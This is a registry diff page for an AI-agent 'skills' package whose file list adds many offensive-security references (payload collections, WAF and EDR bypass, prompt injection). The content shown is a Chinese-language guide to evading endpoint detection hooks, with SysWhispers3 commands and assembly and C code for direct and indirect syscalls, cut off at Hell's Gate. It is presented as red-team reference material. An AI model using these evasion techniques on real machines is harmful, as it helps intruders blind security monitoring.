opencode-skills-collection 4.0.43 → 4.0.44

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (270) hide show
  1. package/bundled-skills/.antigravity-install-manifest.json +47 -1
  2. package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
  3. package/bundled-skills/api-security/SKILL.md +205 -0
  4. package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
  5. package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
  6. package/bundled-skills/apk-reverse/SKILL.md +438 -0
  7. package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
  8. package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
  9. package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
  10. package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
  11. package/bundled-skills/attack-chain/SKILL.md +185 -0
  12. package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
  13. package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
  14. package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
  15. package/bundled-skills/attack-chain/references/phases.md +490 -0
  16. package/bundled-skills/binary-diff/SKILL.md +320 -0
  17. package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
  18. package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
  19. package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
  20. package/bundled-skills/case-review/SKILL.md +167 -0
  21. package/bundled-skills/cloud-k8s/SKILL.md +124 -0
  22. package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
  23. package/bundled-skills/code-audit/SKILL.md +92 -0
  24. package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
  25. package/bundled-skills/database-security/SKILL.md +81 -0
  26. package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
  27. package/bundled-skills/diagram-generator/SKILL.md +199 -0
  28. package/bundled-skills/diagram-generator/references/README.md +3 -0
  29. package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
  30. package/bundled-skills/digital-forensics/SKILL.md +93 -0
  31. package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
  32. package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
  33. package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
  34. package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
  35. package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
  36. package/bundled-skills/docs/sources/sources.md +9 -0
  37. package/bundled-skills/docs/users/aas-core.md +1 -1
  38. package/bundled-skills/docs/users/bundles.md +1 -1
  39. package/bundled-skills/docs/users/claude-code-skills.md +1 -1
  40. package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
  41. package/bundled-skills/docs/users/kiro-integration.md +1 -1
  42. package/bundled-skills/docs/users/usage.md +3 -3
  43. package/bundled-skills/docs/users/visual-guide.md +4 -4
  44. package/bundled-skills/docs-generator/SKILL.md +197 -0
  45. package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
  46. package/bundled-skills/docs-generator/references/templates.md +102 -0
  47. package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
  48. package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
  49. package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
  50. package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
  51. package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
  52. package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
  53. package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
  54. package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
  55. package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
  56. package/bundled-skills/email-security/SKILL.md +81 -0
  57. package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
  58. package/bundled-skills/firmware-pentest/SKILL.md +381 -0
  59. package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
  60. package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
  61. package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
  62. package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
  63. package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
  64. package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
  65. package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
  66. package/bundled-skills/hardware-security/SKILL.md +80 -0
  67. package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
  68. package/bundled-skills/ida-reverse/SKILL.md +401 -0
  69. package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
  70. package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
  71. package/bundled-skills/identity-federation/SKILL.md +81 -0
  72. package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
  73. package/bundled-skills/instructree/SKILL.md +94 -0
  74. package/bundled-skills/js-reverse/SKILL.md +239 -0
  75. package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
  76. package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
  77. package/bundled-skills/js-reverse/references/env-patching.md +6 -0
  78. package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
  79. package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
  80. package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
  81. package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
  82. package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
  83. package/bundled-skills/js-reverse/references/output-contract.md +9 -0
  84. package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
  85. package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
  86. package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
  87. package/bundled-skills/llm-security/SKILL.md +160 -0
  88. package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
  89. package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
  90. package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
  91. package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
  92. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
  93. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
  94. package/bundled-skills/macos-reverse/SKILL.md +85 -0
  95. package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
  96. package/bundled-skills/malware-analysis/SKILL.md +311 -0
  97. package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
  98. package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
  99. package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
  100. package/bundled-skills/mobile-reverse/SKILL.md +222 -0
  101. package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
  102. package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
  103. package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
  104. package/bundled-skills/muapi-media/SKILL.md +311 -0
  105. package/bundled-skills/ot-ics/SKILL.md +117 -0
  106. package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
  107. package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
  108. package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
  109. package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
  110. package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
  111. package/bundled-skills/pentest-tools/SKILL.md +346 -0
  112. package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
  113. package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
  114. package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
  115. package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
  116. package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
  117. package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
  118. package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
  119. package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
  120. package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
  121. package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
  122. package/bundled-skills/pentest-tools/references/payloads.md +32 -0
  123. package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
  124. package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
  125. package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
  126. package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
  127. package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
  128. package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
  129. package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
  130. package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
  131. package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
  132. package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
  133. package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
  134. package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
  135. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
  136. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
  137. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
  138. package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
  139. package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
  140. package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
  141. package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
  142. package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
  143. package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
  144. package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
  145. package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
  146. package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
  147. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
  148. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
  149. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
  150. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
  151. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
  152. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
  153. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
  154. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
  155. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
  156. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
  157. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
  158. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
  159. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
  160. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
  161. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
  162. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
  163. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
  164. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
  165. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
  166. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
  167. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
  168. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
  169. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
  170. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
  171. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
  172. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
  173. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
  174. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
  175. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
  176. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
  177. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
  178. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
  179. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
  180. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
  181. package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
  182. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
  183. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
  184. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
  185. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
  186. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
  187. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
  188. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
  189. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
  190. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
  191. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
  192. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
  193. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
  194. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
  195. package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
  196. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
  197. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
  198. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
  199. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
  200. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
  201. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
  202. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
  203. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
  204. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
  205. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
  206. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
  207. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
  208. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
  209. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
  210. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
  211. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
  212. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
  213. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
  214. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
  215. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
  216. package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
  217. package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
  218. package/bundled-skills/protocol-reverse/SKILL.md +108 -0
  219. package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
  220. package/bundled-skills/pwn-chain/SKILL.md +209 -0
  221. package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
  222. package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
  223. package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
  224. package/bundled-skills/radare2/SKILL.md +460 -0
  225. package/bundled-skills/radare2/references/cheatsheet.md +129 -0
  226. package/bundled-skills/radio-sdr/SKILL.md +77 -0
  227. package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
  228. package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
  229. package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
  230. package/bundled-skills/reverse-engineering/SKILL.md +213 -0
  231. package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
  232. package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
  233. package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
  234. package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
  235. package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
  236. package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
  237. package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
  238. package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
  239. package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
  240. package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
  241. package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
  242. package/bundled-skills/reverse-engineering/references/languages.md +499 -0
  243. package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
  244. package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
  245. package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
  246. package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
  247. package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
  248. package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
  249. package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
  250. package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
  251. package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
  252. package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
  253. package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
  254. package/bundled-skills/reverse-engineering/references/tools.md +546 -0
  255. package/bundled-skills/supply-chain-security/SKILL.md +180 -0
  256. package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
  257. package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
  258. package/bundled-skills/thick-client/SKILL.md +104 -0
  259. package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
  260. package/bundled-skills/threat-hunting/SKILL.md +94 -0
  261. package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
  262. package/bundled-skills/threat-intelligence/SKILL.md +176 -0
  263. package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
  264. package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
  265. package/bundled-skills/wifi-wireless/SKILL.md +80 -0
  266. package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
  267. package/bundled-skills/windows-ad/SKILL.md +109 -0
  268. package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
  269. package/package.json +1 -1
  270. package/skills_index.json +1214 -2
@@ -0,0 +1,338 @@
1
+ # Unhook / 直接 / 间接 syscall 技术清单
2
+
3
+ > 仅限授权红队 / 对抗演练 / 自有产品测试,禁止用于未授权目标。
4
+
5
+ 本文档汇总当前主流的"绕过用户态 hook"技术,从最经典的 unhook 到最新的 hardware breakpoint Blindside。
6
+ 所有技术都对照 MITRE ATT&CK T1562.001 / T1027 / T1055,便于报告输出。
7
+
8
+ ## 1. Peruns Fart / Fresh Ntdll from disk
9
+
10
+ ### 原理
11
+
12
+ EDR 的 hook 全部位于 **当前进程内存中的 ntdll.dll**。磁盘上 `C:\Windows\System32\ntdll.dll` 是干净的。
13
+ 所以只要把磁盘 ntdll 重新映射进当前进程并覆盖内存中的 `.text` 段,hook 就被擦掉。
14
+
15
+ ```text
16
+ 当前进程 ntdll.dll (RWX)
17
+ ┌─────────────────────────┐
18
+ │ .text (含 EDR hook jmp) │ ◄── 用磁盘干净 .text 覆盖
19
+ └─────────────────────────┘
20
+
21
+ │ NtMapViewOfSection(disk_ntdll)
22
+
23
+ 磁盘 C:\Windows\System32\ntdll.dll ← 干净
24
+ ```
25
+
26
+ ### 实现要点
27
+
28
+ ```c
29
+ // 步骤:
30
+ // 1. CreateFileW("\\Device\\HarddiskVolumeX\\Windows\\System32\\ntdll.dll") // 用原生路径绕监控
31
+ // 2. NtCreateSection (SEC_IMAGE)
32
+ // 3. NtMapViewOfSection 到一个新地址
33
+ // 4. 找新地址 .text 段
34
+ // 5. NtProtectVirtualMemory 把当前 ntdll .text 改 RW
35
+ // 6. memcpy 覆盖
36
+ // 7. NtProtectVirtualMemory 还原为 RX
37
+ ```
38
+
39
+ ### 注意
40
+
41
+ - `NtProtectVirtualMemory` 本身可能就是 hook 的 → 链式问题。解决:先用 **直接 syscall** 调 `NtProtectVirtualMemory`
42
+ - 现代 EDR 已经监控 `NtProtectVirtualMemory` 对 ntdll 内存的 W 操作,需要配合 ETW patch
43
+ - Peruns Fart 在 ETW-TI 下会留下事件 `KERNEL_MODULE_LOAD`、`PROTECTVM` — 一定要先压 ETW
44
+
45
+ ## 2. 直接 syscall (Direct Syscall)
46
+
47
+ ### 原理
48
+
49
+ 不调用 ntdll 的导出函数,自己写 syscall stub:
50
+
51
+ ```asm
52
+ NtAllocateVirtualMemory:
53
+ mov r10, rcx
54
+ mov eax, 0x18 ; SSN (Win11 24H2 上的值,每个版本不同)
55
+ syscall
56
+ ret
57
+ ```
58
+
59
+ `syscall` 指令直接从用户态跳到内核 SSDT,跳过任何用户态 hook。
60
+
61
+ ### SysWhispers3 用法
62
+
63
+ ```powershell
64
+ git clone https://github.com/klezVirus/SysWhispers3
65
+ cd SysWhispers3
66
+ python3 syswhispers.py --preset all --action edit -o syscalls
67
+ ```
68
+
69
+ 输出:
70
+
71
+ ```text
72
+ syscalls.h - 函数声明
73
+ syscalls.c - C 胶水代码
74
+ syscalls.asm - MASM 汇编 stub
75
+ syscallsstubs.std.x64.asm - 标准直接 syscall
76
+ ```
77
+
78
+ 在 Visual Studio 中:
79
+
80
+ ```text
81
+ 1. 把 .asm 加入项目,启用 MASM (Custom Build Tool)
82
+ 2. include syscalls.h
83
+ 3. 调用 Sw3NtAllocateVirtualMemory(...) 替换原 NtAllocateVirtualMemory
84
+ ```
85
+
86
+ ### 最小直接 syscall 调 NtCreateFile(C 代码骨架)
87
+
88
+ ```c
89
+ // syscalls.asm(节选)
90
+ // Sw3NtCreateFile PROC
91
+ // mov [rsp +8], rcx
92
+ // mov [rsp+16], rdx
93
+ // mov [rsp+24], r8
94
+ // mov [rsp+32], r9
95
+ // sub rsp, 28h
96
+ // mov ecx, 0x55 ; function hash (动态解析 SSN)
97
+ // call Sw3GetSyscallNumber
98
+ // add rsp, 28h
99
+ // mov rcx, [rsp+8]
100
+ // mov rdx, [rsp+16]
101
+ // mov r8, [rsp+24]
102
+ // mov r9, [rsp+32]
103
+ // mov r10, rcx
104
+ // syscall
105
+ // ret
106
+ // Sw3NtCreateFile ENDP
107
+
108
+ #include <windows.h>
109
+ #include "syscalls.h"
110
+
111
+ int main(void) {
112
+ HANDLE hFile = NULL;
113
+ OBJECT_ATTRIBUTES oa;
114
+ UNICODE_STRING uName;
115
+ IO_STATUS_BLOCK iosb;
116
+ WCHAR path[] = L"\\??\\C:\\Windows\\Temp\\edr_test.bin";
117
+
118
+ uName.Buffer = path;
119
+ uName.Length = (USHORT)(wcslen(path) * sizeof(WCHAR));
120
+ uName.MaximumLength = uName.Length + sizeof(WCHAR);
121
+
122
+ InitializeObjectAttributes(&oa, &uName, OBJ_CASE_INSENSITIVE, NULL, NULL);
123
+
124
+ NTSTATUS st = Sw3NtCreateFile(
125
+ &hFile,
126
+ FILE_GENERIC_WRITE,
127
+ &oa,
128
+ &iosb,
129
+ NULL,
130
+ FILE_ATTRIBUTE_NORMAL,
131
+ 0,
132
+ FILE_OVERWRITE_IF,
133
+ FILE_SYNCHRONOUS_IO_NONALERT,
134
+ NULL,
135
+ 0
136
+ );
137
+
138
+ if (st >= 0) {
139
+ // 写一些字节略
140
+ Sw3NtClose(hFile);
141
+ return 0;
142
+ }
143
+ return (int)st;
144
+ }
145
+ ```
146
+
147
+ ### 缺点
148
+
149
+ - syscall 指令位于 implant 自己的 `.text` 段(非 ntdll 内)→ kernel-mode telemetry 容易看出 "syscall from non-ntdll address"
150
+ - 这就是 indirect syscall 出现的原因
151
+
152
+ ## 3. 间接 syscall (Indirect Syscall)
153
+
154
+ ### 原理
155
+
156
+ syscall 指令仍然来自 ntdll.dll(合法地址),只是 SSN 和返回地址我们自己控制:
157
+
158
+ ```text
159
+ implant 代码:
160
+ mov r10, rcx
161
+ mov eax, <SSN>
162
+ jmp [<ntdll 中某个 syscall;ret gadget 的地址>] ; 不是 syscall 在 implant 里
163
+ ```
164
+
165
+ 跳到的 gadget 通常就是 `Nt*` 函数末尾的 `syscall; ret` 两字节序列。
166
+ kernel-mode ETW provider 看到的 RIP 是 ntdll 地址,符合合法行为模式。
167
+
168
+ ### SysWhispers3 indirect 模式
169
+
170
+ ```powershell
171
+ python3 syswhispers.py --preset all --action edit --mode jumper -o syscalls
172
+ # --mode jumper => indirect syscall
173
+ # --mode jumper_randomized => 随机化 jmp 目标减少签名
174
+ ```
175
+
176
+ 生成的 stub:
177
+
178
+ ```asm
179
+ Sw3NtAllocateVirtualMemory PROC
180
+ mov [rsp+8], rcx
181
+ ...
182
+ mov ecx, 0x18 ; function hash
183
+ call Sw3GetSyscallNumber ; 返回 SSN -> eax
184
+ call Sw3GetSyscallAddress ; 返回 ntdll 中 syscall;ret 地址 -> rbx
185
+ ...
186
+ mov r10, rcx
187
+ jmp rbx ; 跳到 ntdll 内合法 syscall 指令
188
+ Sw3NtAllocateVirtualMemory ENDP
189
+ ```
190
+
191
+ ## 4. Hell's Gate / Halo's Gate / Tartarus Gate
192
+
193
+ 三者解决"SSN 动态解析"的演进。
194
+
195
+ ### Hell's Gate
196
+
197
